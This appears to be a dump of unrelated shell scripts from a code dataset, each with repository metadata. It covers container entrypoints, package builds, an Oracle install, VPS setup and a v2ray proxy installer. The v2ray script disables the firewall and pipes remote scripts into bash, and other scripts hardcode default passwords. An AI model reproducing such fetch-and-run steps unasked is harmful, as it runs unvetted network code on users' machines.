echo "Starting ..."
# exec replaces the shell so gunicorn receives container signals
# (e.g. SIGTERM on shutdown) directly.
exec gunicorn --bind 0.0.0.0:3000 wsgi:app
| true
|
d6b53daf16f610d4be2740ab0351b65dfeb3904f
|
Shell
|
ghoulmann/Psiphon-TKLPatch
|
/overlay/usr/lib/inithooks/bin/psiphon_cert.sh
|
UTF-8
| 416
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/sh
# Generate a self-signed SSL certificate/key pair for Psiphon's Apache,
# valid for one year, using the config at /etc/psiphon/openssl.cnf.
echo "####################################################"
echo "### Creating SSL certificate and key for Psiphon ###"
echo "####################################################"
#This prompts for domain name or IP address
openssl req -nodes -x509 -new -out /opt/psiphon/apache2/ssl/psiphon2.crt -keyout /opt/psiphon/apache2/ssl/psiphon2.key -days 365 -config /etc/psiphon/openssl.cnf -newkey rsa:2048
| true
|
6daea9fd359c306ab977ba3b2f41e22a3b06ce86
|
Shell
|
wolfbox/packages
|
/glibc/PKGBUILD
|
UTF-8
| 3,853
| 2.640625
| 3
|
[] |
no_license
|
_pkgbase=glibc
pkgname=glibc
pkgver=2.21
pkgrel=1
pkgdesc="The GNU libc"
arch=("x86_64")
url="http://www.gnu.org/s/libc/"
license=(GPL2 LGPL2.1)
options=('!strip' '!emptydirs')
depends=('linux' 'tzdata')
source=(ftp://ftp.gnu.org/gnu/libc/glibc-${pkgver}.tar.gz{,.sig}
glibc-2.10-dns-no-gethostbyname4.diff
glibc-2.21-roundup.patch
glibc.ldd.trace.through.dynamic.linker.diff
glibc.locale.no-archive.diff
glibc.nis-netgroups.diff
glibc.ru_RU.CP1251.diff
is_IS.diff
PKGBUILD.32)
sha256sums=('8d8f78058f2e9c7237700f76fe4e0ae500db31470290cd0b8a9739c0c8ce9738'
'SKIP'
'b1faf214be20843c851f912d5c2ca14c7c7184658ba3f24fb8ce579c6c67d1d4'
'167a7bd9bdef06285ff737cf4ae4b66c88e6be72bd9306f64bc0a394764d6237'
'9663b115474fd722d8f090a09a8ebbacfa19af3609437eae486a38edeccf2369'
'b2c6b0cd7f10d11cb5754b48eeaca705cef414c9dce64efaad0bba2472096f34'
'f45cb3f9982bc35bd6d6020db2834df3b5e509d6339416a9f37397ceb91db523'
'4bc95730d37f25a14b8259965abba249c2361da4bc28037408a8ac99fd98158e'
'6f47310a8f4d3727b4742fe385f9948e9da79a52602459c1517165de2488e48f'
'SKIP')
validpgpkeys=(F37CDAB708E65EA183FD1AF625EF0A436C2A4AFF) # Carlos O'Donell <carlos@systemhalted.org>
prepare() {
cd ${_pkgbase}-${pkgver}
# Use old-style locale directories rather than a single (and strangely
# formatted) /usr/lib/locale/locale-archive file:
patch -p1 -i "${srcdir}"/glibc.locale.no-archive.diff
# The is_IS locale is causing a strange error about the "echn" command
# not existing. This patch reverts is_IS to the version shipped in
# glibc-2.5:
patch -p1 -i "${srcdir}"/is_IS.diff
# Fix NIS netgroups:
patch -p1 -i "${srcdir}"/glibc.nis-netgroups.diff
# Support ru_RU.CP1251 locale:
patch -p1 -i "${srcdir}"/glibc.ru_RU.CP1251.diff
# Fix resolver problem with glibc-2.9:
patch -p0 -i "${srcdir}"/glibc-2.10-dns-no-gethostbyname4.diff
# Make it harder for people to trick ldd into running code:
patch -p1 -i "${srcdir}"/glibc.ldd.trace.through.dynamic.linker.diff
# From upstream, fix jump label
patch -p1 -i "${srcdir}"/glibc-2.21-roundup.patch
# Set some paths properly
echo slibdir=/usr/lib/${MULTIARCH} > configparms
echo rtlddir=/usr/lib/${MULTIARCH} >> configparms
echo sbindir=/usr/bin >> configparms
echo rootsbindir=/usr/bin >> configparms
}
build() {
cd ${_pkgbase}-${pkgver}
mkdir -p build
cd build
cp ../configparms ./
# Hardening flags don't play nicely with glibc
unset CPPFLAGS
export CFLAGS=-O3
export CXXFLAGS=-O3
../configure \
--prefix=/usr \
--libdir=/usr/lib/${MULTIARCH} \
--libexecdir=/usr/lib/${MULTIARCH} \
--sbindir=/usr/bin \
--enable-kernel=3.18 \
--with-headers=/usr/include \
--enable-add-ons \
--enable-obsolete-rpc \
--enable-profile \
--enable-stackguard-randomization \
--with-tls \
--with-__thread \
--without-cvs
make
}
package() {
cd ${_pkgbase}-${pkgver}/build
make install install_root="${pkgdir}"
make localedata/install-locales install_root="${pkgdir}"
# Install a link of ld-linux into /lib64 for compatibility
mkdir -p "${pkgdir}"/lib64
ln -s /usr/lib/${MULTIARCH}/ld-linux-${CARCH/_/-}.so.2 "${pkgdir}"/lib64
# Manually strip. Removing debugging symbols is safe and doesn't break valgrind
( cd "${pkgdir}"
find usr/lib/${MULTIARCH} | xargs file | grep "shared object" | grep ELF | cut -f 1 -d : | xargs strip -g
strip ${STRIP_STATIC} "${pkgdir}"/usr/lib/${MULTIARCH}/*.a
find usr/bin/ | xargs file | grep "executable" | grep ELF | cut -f 1 -d : | xargs strip ${STRIP_BINARIES} 2>/dev/null )
}
| true
|
b0da872447c7b7bfc9960b01c9525b4f4dcf313b
|
Shell
|
deepfence/ThreatMapper
|
/haproxy/router-entrypoint.sh
|
UTF-8
| 1,299
| 3.875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# HAProxy router entrypoint: assemble the TLS PEM (user-provided certs
# override the defaults), add useful haproxy flags, wait for the backend
# API, then exec haproxy.
cat /usr/local/etc/haproxy/deepfence.crt /usr/local/etc/haproxy/deepfence.key > /usr/local/etc/haproxy/deepfence.pem
# Override default cert files by copying user provided certificates for nginx (if present)
# the provided filenames should have .key and .crt extensions
CERTIFICATE_DIR="/etc/deepfence/certs"
if [[ -d ${CERTIFICATE_DIR} && -n "$(ls -i ${CERTIFICATE_DIR})" ]]; then
    # `ls` output is only used as a non-empty-directory check here.
    key=$(ls ${CERTIFICATE_DIR}/*.key 2>/dev/null)
    crt=$(ls ${CERTIFICATE_DIR}/*.crt 2>/dev/null)
    if [[ -n ${key} && -n ${crt} ]]; then
        # PEM layout: certificate first, then the private key.
        cat "${crt}" > /usr/local/etc/haproxy/deepfence.pem
        echo \ >> /usr/local/etc/haproxy/deepfence.pem
        cat "${key}" >> /usr/local/etc/haproxy/deepfence.pem
    fi
fi
# first arg is `-f` or `--some-option`
if [[ "${1#-}" != "$1" ]]; then
    set -- haproxy "$@"
fi
if [[ "$1" = 'haproxy' ]]; then
    shift # "haproxy"
    # if the user wants "haproxy", let's add a couple useful flags
    # -W  -- "master-worker mode" (similar to the old "haproxy-systemd-wrapper"; allows for reload via "SIGUSR2")
    # -db -- disables background mode
    # -q  -- disables logging
    set -- haproxy -W -db "$@"
fi
# Block until the backend API answers its health endpoint.
until curl -s "http://deepfence-server:8080/deepfence/ping" > /dev/null; do
    echo "Waiting for containers to start up"
    sleep 15
done
echo "Starting router"
exec "$@"
| true
|
fdbe26c7f93b751a16d40c93a62d6a82f9acb259
|
Shell
|
7208sagar/shellcriptprogram
|
/poweroftwo.sh
|
UTF-8
| 138
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Print the first n powers of two, one per line (2^0 .. 2^(n-1)).
read -p "enter the Number :-" n
for (( count = 0; count < n; count++ ))
do
    echo $(( 2 ** count ))
done
| true
|
11e508f9f8c81a32142569ec85de7b75bc72251d
|
Shell
|
mateiclaudiu/katas-agile-technical-practices
|
/scripts/refactor.sh
|
UTF-8
| 244
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#this script runs all backend tests on each file change in the backend code
# requirement: brew install fswatch
scripts_dir="./scripts"
source_dir="./src"
# fswatch -o emits one event-count line per change batch; xargs turns each
# line into one invocation of the test-commit-revert script.
fswatch -o -r "$source_dir" | xargs -n1 -I{} "$scripts_dir/tcr.sh"
| true
|
f028d5a858e9c3f00d5748813995d8fa8dba433f
|
Shell
|
lsds/sgx-lkl
|
/src/vicsetup/tests/verity/test-verity.sh
|
UTF-8
| 2,616
| 3.90625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
##==============================================================================
##
## Check usage:
##
##==============================================================================
if [ "$#" -gt 1 ]; then
echo "Usage: $0 <num-blocks>"
exit 1
fi
if [ "$#" == 1 ]; then
num_blocks=$1
else
num_blocks=256
fi
##==============================================================================
##
## Generate an image file with random data
##
##==============================================================================
rm -f verity verity.hash
dd if=/dev/urandom of=verity bs=4096 count=${num_blocks} 2> /dev/null
##==============================================================================
##
## Run "veritysetup format" action
##
##==============================================================================
if [ -z "${BLKSZ}" ]; then
BLKSZ=4096
fi
TMP=$(/bin/mktemp)
if ! veritysetup format --data-block-size="${BLKSZ}" --hash-block-size="${BLKSZ}" verity verity.hash > "${TMP}";
then
echo "$0: *** veritysetup failed"
exit 1
fi
root=$(grep "Root hash:" "${TMP}" | sed 's/Root hash:[\t ]*//g')
salt=$(grep "Salt:" "${TMP}" | sed 's/Salt:[\t ]*//g')
uuid=$(grep "UUID:" "${TMP}" | sed 's/UUID:[\t ]*//g')
#echo root=${root}
#echo uuid=${uuid}
##==============================================================================
##
## Run "vicsetup verityFormat" action
##
##==============================================================================
if ! vicsetup verityFormat --salt "${salt}" --uuid "${uuid}" --data-block-size="${BLKSZ}" --hash-block-size="${BLKSZ}" verity hashtree > /dev/null;
then
echo "$0: *** vicsetup hashtree failed"
exit 1
fi
##==============================================================================
##
## Verify that verity.hash and hashtree are idential
##
##==============================================================================
if ! cmp verity.hash hashtree;
then
echo "$0: *** hash tree comparison failed"
exit 1
fi
#rm -f verity verity.hash hashtree
echo "success"
##==============================================================================
##
## Attempt to open and close the verity device
##
##==============================================================================
dm_name=testverity
if ! vicsetup verityOpen verity "${dm_name}" hashtree "${root}";
then
echo "$0: *** vicsetup verityOpen failed"
exit 1
fi
TMP=$(/bin/mktemp)
dd if=/dev/mapper/"${dm_name}" of="${TMP}" > /dev/null 2> /dev/null
cmp "${TMP}" verity
rm "${TMP}"
vicsetup verityClose "${dm_name}"
| true
|
0019c0aabba8e751f34893d3d0daaf0332075301
|
Shell
|
Codebyme/AMH-Debian-Install
|
/OfficialModelScript/PDO_MYSQL-1.0.2/AMHScript
|
UTF-8
| 1,933
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin;
#info
function amh_module_info()
{
echo 'AMH-ModuleName: PDO_MYSQL-1.0.2';
echo 'AMH-ModuleDescription: PDO扩展为PHP访问数据库定义了一个轻量级的、一致性的接口,它提供了一个数据访问抽象层,这样,无论使用什么数据库,都可以通过一致的函数执行查询和获取数据。';
echo 'AMH-ModuleButton: 安装/卸载';
echo 'AMH-ModuleDate: 2013-1-31';
echo 'AMH-ModuleAdmin: ';
echo 'AMH-ModuleWebSite: http://amysql.com';
echo 'AMH-ModuleScriptBy: Amysql';
}
#install
function amh_module_install()
{
if amh_module_status ; then
exit;
else
cd /usr/local/;
wget http://code.amysql.com/files/PDO_MYSQL-1.0.2.tgz;
tar -zxvf PDO_MYSQL-1.0.2.tgz;
cd PDO_MYSQL-1.0.2;
/usr/local/php/bin/phpize;
./configure --with-php-config=/usr/local/php/bin/php-config -with-pdo-mysql=/usr/local/mysql/bin/mysql_config;
make && make install;
cat >> /etc/php.ini <<EOF
[pdo_mysql]
extension = /usr/local/php/lib/php/extensions/no-debug-non-zts-20090626/pdo_mysql.so
EOF
amh php reload;
amh_module_status;
fi;
}
#admin
function amh_module_admin()
{
if amh_module_status ; then
echo '[OK] PDO_MYSQL-1.0.2 No management options.';
else
exit;
fi;
}
#uninstall
function amh_module_uninstall()
{
if amh_module_status ; then
cd /usr/local/;
rm -rf PDO_MYSQL-1.0.2.tgz;
rm -rf PDO_MYSQL-1.0.2;
rm -rf /usr/local/php/lib/php/extensions/no-debug-non-zts-20090626/pdo_mysql.so;
sed -i "/pdo_mysql\.so/d" /etc/php.ini;
sed -i "/\[pdo_mysql]/d" /etc/php.ini;
amh php reload;
echo '[OK] PDO_MYSQL-1.0.2 Uninstall successful.';
else
exit;
fi;
}
#status
function amh_module_status()
{
if grep -q '\[pdo_mysql\]' /etc/php.ini; then
echo '[OK] PDO_MYSQL-1.0.2 is already installed.';
return 0;
else
echo '[Notice] PDO_MYSQL-1.0.2 is not installed.';
return 1;
fi;
}
| true
|
f73404208e29eb61de7226ea4928f9c0bd4dc3e3
|
Shell
|
zouppen/phasefulsplitter
|
/src/spawner
|
UTF-8
| 522
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Spawn processors to multiple cores
# Usage: ./spawner command number_of_cpus target_dir
CMD=$1
MAXJOBS=$2
TARGET=$3
N=1
while read FILENAME; do
while true; do
JOBS=$(jobs -rp|wc -l)
if [[ $JOBS -lt $MAXJOBS ]]; then
echo spawning $FILENAME
echo "$FILENAME" >$TARGET/blob-$N.filename
$CMD $FILENAME $TARGET/blob-$N &
N=$(( $N + 1 ))
break
fi
sleep 5
done
done
echo "No more files in the queue. Waiting for the last ones."
wait
echo "All files are processed."
| true
|
3efef804a4bdd433ac79613debf1ce1170a710fc
|
Shell
|
WhatHai/document_database
|
/oracle-master/scripts/install_db.sh
|
UTF-8
| 2,367
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# author: BoobooWei
# Desc: 安装数据库
# User: Oracle
## 1. 根据模板配置创建参数文件
export ORACLE_SID=BOOBOO
mkdir -p $ORACLE_BASE/oradata/$ORACLE_SID
mkdir -p $ORACLE_BASE/admin/$ORACLE_SID/adump
mkdir -p $ORACLE_BASE/flash_recovery_area
grep -v '^#\|^$' $ORACLE_HOME/dbs/init.ora | sed "s/\(ORCL\|orcl\)/${ORACLE_SID}/;s/<ORACLE_BASE>/\$ORACLE_BASE/;s@ora_control1@\$ORACLE_BASE/oradata/${ORACLE_SID}/ora_control1.ctl@;s@ora_control2@\$ORACLE_BASE/oradata/${ORACLE_SID}/ora_control2.ctl@" > $ORACLE_HOME/dbs/init${ORACLE_SID}.ora
## 2. 创建口令文件
orapwd file=orapw$ORACLE_SID password=oracle entries=30
## 3. 创建pfile并启动到nomount状态
echo "create spfile from pfile" | sqlplus / as sysdba
echo "startup nomount" | sqlplus / as sysdba
## 4. 生成建库SQL
cat > createdb.sql << ENDF
CREATE DATABASE $ORACLE_SID
USER SYS IDENTIFIED BY oracle
USER SYSTEM IDENTIFIED BY oracle
LOGFILE GROUP 1 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo01a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo01b.log') SIZE 100M BLOCKSIZE 512,
GROUP 2 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo02a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo02b.log') SIZE 100M BLOCKSIZE 512,
GROUP 3 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo03a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo03b.log') SIZE 100M BLOCKSIZE 512
MAXLOGFILES 5
MAXLOGMEMBERS 5
MAXLOGHISTORY 1
MAXDATAFILES 100
CHARACTER SET US7ASCII
NATIONAL CHARACTER SET AL16UTF16
EXTENT MANAGEMENT LOCAL
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/system01.dbf' SIZE 325M REUSE
SYSAUX DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/sysaux01.dbf' SIZE 325M REUSE
DEFAULT TABLESPACE users
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/users01.dbf'
SIZE 500M REUSE AUTOEXTEND ON MAXSIZE UNLIMITED
DEFAULT TEMPORARY TABLESPACE temp
TEMPFILE '$ORACLE_BASE/oradata/$ORACLE_SID/temp01.dbf'
SIZE 20M REUSE
UNDO TABLESPACE undotbs1
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/undotbs01.dbf'
SIZE 200M REUSE AUTOEXTEND ON MAXSIZE UNLIMITED;
ENDF
echo "@createdb.sql" | sqlplus / as sysdba
## 5. 执行生成数据字典信息的脚本并执行
cat > 1.sql << ENDF
@?/rdbms/admin/catalog.sql
@?/rdbms/admin/catproc.sql
conn system/oracle
@?/sqlplus/admin/pupbld.sql
ENDF
echo "@1.sql" | sqlplus / as sysdba
| true
|
916a4f7ed3938fe3ce8c16676ac877e2cc7d1ee5
|
Shell
|
bboyadao/shell
|
/newvps.sh
|
UTF-8
| 2,064
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
user="${whoami}"
echo $user
echo "Tiến hành setup trên vps mới"
echo "Cài đặt python3, nginx, uwsgi, postgresql..."
sudo su -c "ln -sf /bin/bash /bin/sh"
sudo su -c "apt-get update"
sudo su -c "apt-get -y install nginx python3 python3-pip python3-dev ufw build-essential python3.6-dev postgresql postgresql-contrib supervisor libpcre3 libpcre3-dev"
sudo su -c "apt-get install -y software-properties-common"
sudo su -c "add-apt-repository -y universe"
sudo su -c "add-apt-repository -y ppa:certbot/certbot"
sudo su -c "apt-get update"
sudo su -c "apt-get -y install python-certbot-nginx"
sudo su -c "pip3 install wheel setuptools --no-cache-dir"
sudo su -c "pip3 install uwsgi -I --no-cache-dir"
sudo su -c "pip3 install virtualenv virtualenvwrapper --no-cache-dir"
sudo su -c 'mkdir -p "/etc/uwsgi/sites"'
sudo su -c 'mkdir -p "/var/log/uwsgi"'
echo "export VIRTUALENVWRAPPER_PYTHON=/usr/bin/python3" >> ~/.bashrc
echo "export WORKON_HOME=~/virtualenvs" >> ~/.bashrc
echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bashrc
source ~/.bashrc
echo "copy file config";
sudo su -c ':> /etc/systemd/system/uwsgi.service';
content=$(< "/home/$USER/uwsgi.service");
# echo "${content/my_user/$USER}" | sudo tee '/etc/systemd/system/uwsgi.service'
echo """
[Unit]
Description=uWSGI Emperor service
[Service]
ExecStartPre=/bin/bash -c 'mkdir -p /run/uwsgi; chown $USER:www-data /run/uwsgi'
ExecStart=/usr/local/bin/uwsgi --emperor /etc/uwsgi/sites
Restart=always
KillSignal=SIGQUIT
Type=notify
NotifyAccess=all
[Install]
WantedBy=multi-user.target
""" | sudo tee '/etc/systemd/system/uwsgi.service'
sudo su -c ':> /etc/supervisor/conf.d/uwsgi.conf'
# sudo su -c "cat uwsgi.conf >> /etc/supervisor/conf.d/uwsgi.conf"
echo """
[program:uwsgi]
command=/usr/local/bin/uwsgi --emperor /etc/uwsgi/apps-enabled
autostart=true
autorestart=true
redirect_stderr=true
stopsignal=QUIT
stdout_logfile=/var/log/uwsgi.log
""" | sudo tee '/etc/supervisor/conf.d/uwsgi.conf'
sudo su -c 'supervisorctl reread'
sudo su -c 'sudo supervisorctl update'
| true
|
89cf6218e326e65bf42433f7df2beb34e17d0cee
|
Shell
|
guenther-brunthaler/usr-local-bin-xworld-jv3gwuidf2ezyr5vbqavqtxyh
|
/mkpairs
|
UTF-8
| 281
| 3.703125
| 4
|
[] |
no_license
|
#! /bin/sh
# Written in 2008 by Guenther Brunthaler.
# Create all possible pairs from input input lines, maintaining their order.
# The pairs will be separated by a tabulation character.
FIRST=
while IFS= read NEXT; do
test -n "$FIRST" && printf '%s\t%s\n' "$FIRST" "$NEXT"
FIRST=$NEXT
done
| true
|
ab5796ff441f639d8cb51a0701b1e7c81eb7f17d
|
Shell
|
DimuthuKasunWP/dokku
|
/tests/unit/20_storage.bats
|
UTF-8
| 1,137
| 2.828125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bats
load test_helper
setup() {
global_setup
create_app
}
teardown() {
destroy_app
global_teardown
}
@test "(storage) storage:mount, storage:list, storage:umount" {
run /bin/bash -c "dokku storage:mount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:list $TEST_APP | grep -qe '^\s*/tmp/mount:/mount'"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:mount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_output "Mount path already exists."
assert_failure
run /bin/bash -c "dokku storage:unmount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:list $TEST_APP | grep -vqe '^\s*/tmp/mount:/mount'"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:unmount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_output "Mount path does not exist."
assert_failure
}
| true
|
257f2ddec571785e26c06edaa4d79f965b2daf2e
|
Shell
|
sounz/SOUNZ-Online
|
/sounz-1.62.0/postbuild.sh
|
UTF-8
| 895
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
###########################################################################
# Post-Build script executed after dpkg-buildpackage is invoked to
# create the package files.
# P Waite, Nov 2007
#
# This script can be put anywhere you like, but normally it lives in the
# top directory of your source package.
#
###########################################################################
# What this script is doing
# Insert your custom post-build processing here
#
# Some parameters available to you:
# $package your package name, from debian/control
# $package_ver debian version being built, from debian/changelog
# $packagesdir directory in which the package will be built
# $VCS path to VCS executable, eg: /usr/bin/svn
# $VCSTYPE type of VCS being used, eg: Vcs-Svn
#
# There are many others (see scripts), but those are the main ones.
#
# ENDS
| true
|
d26d7ddf0e1b71a48a99f432667801f8b6fe65ca
|
Shell
|
sywen-scut/MultiCoreSystem-simulator
|
/generator/trace_cpu/analysis/get_lest_line.sh
|
UTF-8
| 529
| 2.640625
| 3
|
[] |
no_license
|
for name in barnes blackscholes canneal dedup ferret fluidanimate freqmine raytrace streamcluster swaptions swaptions
do
for method in xy
do
dir=cpu_"$name"_"$method".txt
dir_out=last_line_"$name"_"$method".txt
echo $dir
echo $dir_out
if [ -f "./last_line/$dir_out" ]
then
rm ./last_line/$dir_out
fi
tail -n 1 ../$dir >> ./last_line/$dir_out
done
done
| true
|
5b818d9342f1b8cdeeee1d599be64d97d248f52b
|
Shell
|
moutsian/lm12_Scripts
|
/from_ibd_conditional/get_high_pcausal_vars.sh
|
UTF-8
| 584
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
shopt -s nullglob
head -n1 "/lustre/scratch113/projects/crohns/iibdgc_meta/results/finemap/12_68492980_CSQ.confset" > "/lustre/scratch115/teams/anderson/ibd_conditional/high_pcausal_CSQ.confset"
array3=(/lustre/scratch113/projects/crohns/iibdgc_meta/results/finemap/*CSQ*)
for i in ${array3[*]}
do
echo "$i\n"
cat ${i} | awk -v FILE="$i" '{split(FILE,arr,"/");split(arr[9],arr2,".");split(arr2[1],arr3,"_");if($3!="NA" && $3>=0.5){print arr3[1]"_"arr3[2]"\t"$0;}}'| grep -v "P_CUMSUM" >> "/lustre/scratch115/teams/anderson/ibd_conditional/high_pcausal_CSQ.confset"
done
| true
|
25d0c883e2a0dd5fa3e3e4828fba6dfd59a81f6b
|
Shell
|
logimic/shape
|
/buildMake.sh
|
UTF-8
| 602
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Script for building shape on Linux machine
project=shape
#expected build dir structure
buildexp=build/Unix_Makefiles
deploydir=deploy/Unix_Makefiles
currentdir=$PWD
builddir=./${buildexp}
mkdir -p ${builddir}
#get path to deploy
mkdir -p ${deploydir}
pushd ${deploydir}
deploydir=$PWD
popd
#launch cmake to generate build environment
pushd ${builddir}
cmake -G "Unix Makefiles" -DBUILD_TESTING:BOOL=true -DCMAKE_BUILD_TYPE=Debug -DSHAPE_DEPLOY:PATH=${deploydir} ${currentdir}
popd
#build from generated build environment
cmake --build ${builddir} --config Debug --target install
| true
|
bed10cfb6fb8dac0c8a838d23b35eb4ab89a2b29
|
Shell
|
ethanpasta/holberton-system_engineering-devops
|
/0x0C-web_server/4-not_found_page_404
|
UTF-8
| 640
| 2.71875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Script configures an Nginx 404 page
apt-get -y update
apt-get -y install nginx
ufw allow 'Nginx HTTP'
echo "Holberton School says hello :)" | sudo tee /var/www/html/index.nginx-debian.html
sed -i '/listen 80 default_server;/a rewrite ^/redirect_me https://www.youtube.com/watch?v=QH2-TGUlwu4 permanent;' /etc/nginx/sites-available/default
echo "Ceci n'est pas une page" | sudo tee /usr/share/nginx/html/404-custom.html
sed -i '/server_name _;/a error_page 404 /404-custom.html;\nlocation = /404-custom.html {\n root /usr/share/nginx/html;\n internal;\n}\n' /etc/nginx/sites-available/default
service nginx start
| true
|
6d39466d3c6935430c1ce9b53594a8b3acc41c32
|
Shell
|
cisco/openh264
|
/autotest/performanceTest/parsePerfData.sh
|
UTF-8
| 3,073
| 3.609375
| 4
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#usage runGetPerformanceInfo ${PerformanceLogFile}
runGetPerformanceInfo_openh264()
{
if [ ! $# -eq 2 ]
then
echo "not enough parameters!"
echo "usage: ${0} [android/ios] ${PerformanceLogFile}"
return 1
fi
local PerformanceLogFile=$2
local FileName=""
local Width=""
local Height=""
local Frames=""
local FPS=""
local EncodeTime=""
if [ $1 = "android" ]
then seperatorNum=3
else
seperatorNum=2
fi
while read line
do
if [[ $line =~ "enc yuv file" ]]
then
FileName=`echo $line | awk 'BEGIN {FS="enc yuv file"} {print $2}'`
FileName=`echo $FileName | awk 'BEGIN {FS=":"} {print $2}'`
fi
if [[ $line =~ "Width" ]]
then
Width=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "Height" ]]
then
Height=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "Frames" ]]
then
Frames=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "FPS" ]]
then
FPS=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
FPS=`echo $FPS | awk 'BEGIN {FS="fps"} {print $1}'`
echo "${FileName},"${Width}x${Height}",${Frames},${FPS}"
fi
if [[ $line =~ "encode time" ]]
then
EncodeTime=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "height" ]]
then
Height=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "H264 source file name" ]]
then
FileName=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
if [ $1 = "ios" ]
then
FileName=`echo $FileName | awk -F"DecoderPerfTestRes" '{print $2}'`
FileName=`echo $FileName | awk -F"/" '{print $2}'`
else
FileName=`echo $FileName | awk -F"/" '{print $4}'`
fi
fi
done <${PerformanceLogFile}
}
AUTO_TEST_RESULT_PATH="./TestResultCSV/"
parseLogToCSV()
{
if [ $# -ne 1 ]
then echo "Please input $0 [android/ios]"
fi
if [ $* = "android" ]
then
Result_log_path="./android/report/"
suffix=android
dos2unix ${Result_log_path}*.*
else
Result_log_path="./ios/report/"
suffix=ios
fi
Result_log=`ls ${Result_log_path}`
for log in ${Result_log}
do
PerformFile=`echo $log |awk -F"." '{print $1}'`
PerformFile=${PerformFile}_${suffix}.csv
#inital perfermance file
echo "$log,,,">>${AUTO_TEST_RESULT_PATH}${PerformFile}
echo "YUV,Resolution,Encodedframes,FPS">>${AUTO_TEST_RESULT_PATH}${PerformFile}
runGetPerformanceInfo_openh264 ${suffix} ${Result_log_path}${log}>>${AUTO_TEST_RESULT_PATH}${PerformFile}
done
}
parseLogToCSV android
parseLogToCSV ios
| true
|
6c14dc3922921e6d87d27bf059d16e10cf71a783
|
Shell
|
qingfenghuohu/os_init
|
/v2ray.sh
|
UTF-8
| 1,321
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
/bin/systemctl stop firewalld
/bin/systemctl disable firewalld
file = /usr/bin/v2ray/v2ray
if [ ! -f "$file" ]; then
yum -y install ntpdate crontab wget
/bin/systemctl restart crond.service
/bin/systemctl enable crond.service
timedatectl set-timezone Asia/Shanghai
ntpdate -u pool.ntp.org
curl https://raw.githubusercontent.com/qingfenghuohu/os_init/master/install-v2ray.sh | bash
curl https://raw.githubusercontent.com/v2fly/fhs-install-v2ray/master/install-dat-release.sh | bash
rm -f /etc/systemd/system/v2ray.service
rm -f /etc/v2ray/config.json
wget -P /etc/systemd/system/ https://raw.githubusercontent.com/qingfenghuohu/os_init/master/v2ray.service
wget -P /etc/v2ray/ https://raw.githubusercontent.com/qingfenghuohu/os_init/master/config.json
systemctl daemon-reload
/bin/systemctl enable v2ray
/bin/systemctl restart v2ray
echo "*/20 * * * * /usr/sbin/ntpdate pool.ntp.org > /dev/null 2>&1" >>/var/spool/cron/root
echo "1,10 * * * * /bin/systemctl restart v2ray > /dev/null 2>&1" >>/var/spool/cron/root
echo "v2ray install success"
fi
bbr=$(lsmod | grep bbr | awk '{print $1}')
if [[ "tcp_bbr" != $bbr ]]; then
curl -L -s https://raw.githubusercontent.com/qingfenghuohu/os_init/master/bbr.sh | bash
reboot
echo "bbr install success"
fi
| true
|
78f86f9142d59b1866f5d99aa7b606a8bcc79394
|
Shell
|
cmward/atc
|
/scripts/data_prep.sh
|
UTF-8
| 2,297
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
## To be run from the project directory.
# Usage:
# sh data_prep <ufa-dir> <ufa-audio-dir> <atcosim-dir> <atcosim-audio-dir> /
# <broadcast-dir> <broadcast-transcript-dir> <partition-path> <data-path>
# For example:
# sh data_prep.sh corpora/UFA_DE corpora/UFA_DE/audio_fixed corpora/ATCOSIM /
# corpora/broadcast corpora/broadcast/hub4_eng_train_trans data_partitioning data
#
### Set up sorting.
export LANG=C; export LC_ALL=C
ufa=$1
ufa_audio=$2
atcosim=$3
atcosim_audio=$4
broadcast=$5
broadcast_trans=$6
partitions=$7
data_path=$8
python scripts/atc_text.py $ufa $atcosim $data_path
